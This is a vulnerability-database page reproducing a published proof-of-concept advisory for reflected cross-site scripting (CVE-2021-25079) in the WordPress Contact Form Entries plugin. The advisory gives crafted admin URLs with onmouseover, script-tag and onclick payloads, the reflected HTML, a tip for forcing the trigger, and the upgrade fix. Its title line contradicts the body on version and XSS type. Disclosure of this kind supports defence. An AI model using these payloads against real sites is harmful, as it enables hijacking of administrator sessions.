Vulners
Lucene search
WordPress Contact Form Entries Cross Site Scripting
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | WordPress Contact Form Entries Cross Site Scripting Vulnerability | 10 Jan 202200:00 | – | zdt |
 | CVE-2021-25079 | 24 Jan 202212:17 | – | circl |
 | WordPress plugin跨站脚本漏洞 | 10 Jan 202200:00 | – | cnnvd |
 | WordPress Contact Form Entries Plugin Security Vulnerability | 14 Jan 202200:00 | – | cnvd |
 | CVE-2021-25079 | 24 Jan 202208:01 | – | cve |
 | CVE-2021-25079 Contact Form Entries < 1.2.4 - Reflected Cross-Site Scripting | 24 Jan 202208:01 | – | cvelist |
 | EUVD-2021-11991 | 7 Oct 202500:30 | – | euvd |
 | Contact Form Entries < 1.2.4 - Cross-Site Scripting | 7 Jun 202603:02 | – | nuclei |
 | CVE-2021-25079 | 24 Jan 202208:15 | – | nvd |
 | Code injection | 24 Jan 202208:15 | – | prion |
10
`# Exploit Title: Contact Form Entries < 1.1.7 - Unauthenticated Stored Cross-Site Scripting.
# Date: 22/12/2021
# Exploit Author: gx1 <gaetano.perrone[at]secsi.io>
# Vulnerability Discovery: Gaetano Perrone (aka gx1)
# Vendor Homepage: https://www.crmperks.com/
# Software Link: https://wordpress.org/plugins/contact-form-entries/
# Version: < 1.2.4
# Tested on: any
# CVE : CVE-2021-25079
# References:
* https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63
* https://secsi.io/blog/cve-2021-25079-multiple-reflected-xss-in-contact-form-entries-plugin/
# Description:
Several params of vxcf_leads administrator page are vulnerable to a Reflected Cross-Site-Scripting vulnerability.
# Proof Of Concept:
The following request:
---------------------------------------------------------------------------------------------------------------------------------------
GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+
---------------------------------------------------------------------------------------------------------------------------------------
returns the list of saved entries in the database.
form_id value is reflected in <input> tag.
form_id parameter is not sanitized, so it is possible to inject arbitrary values.
The following request:
---------------------------------------------------------------------------------------------------------------------------------------
http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+onmouseover%3Dalert%281%29+ne97l&status&tab=entries&search&order=desc&orderby=fir+
---------------------------------------------------------------------------------------------------------------------------------------
Allows to inject onmouseover inside the input form.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<input class="hide-column-tog" name="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" type="checkbox" id="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" value="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl" checked='checked' />Source</label><label>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
By moving the mouse inside the click element, the vulnerability is triggered. Even if the vulnerability seems to require the user to move the mouse on the input element, it is possible to improve the attack by just injecting a “style” section that expands the input element with large width and height. In this way, when the user clicks on the link, javascript code is executed.
status param is vulnerable to most dangerous XSS attack: just sending the following request
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=b9zrb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eg482f&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
will execute XSS vulnerability.
order, orderby and search parameters are also vulnerable to XSS:
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir%20ihj17%22accesskey%3d%22x%22onclick%3d%22alert(1)%22%2f%2fv9tdt
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# Solution:
Upgrade Contact Form Entries to version 1.2.4
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Jan 2022 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.01396